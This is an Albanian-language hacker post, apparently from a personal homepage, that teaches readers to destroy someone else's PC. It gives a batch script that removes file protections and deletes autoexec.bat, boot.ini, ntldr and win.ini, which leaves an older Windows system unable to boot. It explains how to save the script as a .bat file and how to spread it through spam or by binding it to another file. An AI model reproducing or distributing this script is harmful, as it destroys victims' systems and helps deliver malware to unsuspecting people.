Image and video hosting by TinyPicImage and video hosting by TinyPicImage and video hosting by TinyPicImage and video hosting by TinyPicImage and video hosting by TinyPicImage and video hosting by TinyPicImage and video hosting by TinyPicImage and video hosting by TinyPicImage and video hosting by TinyPic< Image and video hosting by TinyPic Image and video hosting by TinyPic
   
  Hacker-DimY.
  Fike nje PC te huaj ... pergjithmon!
 
 u paralajmroj se unë nuk mbajë përgjegjsi per dëmet që mundë ti shkaktoni ju.

Hapim Notepadin dhe vendosim këtë kodë:

---------------------------------------------------------

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini

-----------------------------------------------------------

E ruajmë këtë fajll me qfardo emri mirpo me prapashtesen .bat pra emri.bat

Për ta ruajtur si bat file tek rubrika Text file document ndrrojeni ne All files.

Kujdes! Mos e hapni këtë fajll ne tuaj.

Tash ju mbetet ta shperndani si të dëshironi ju ,me spam apo edhe tia bashkangjitni një fajlli tjetër me ndonjë file binder.
 
   
 
=> Do you also want a homepage for free? Then click here! <=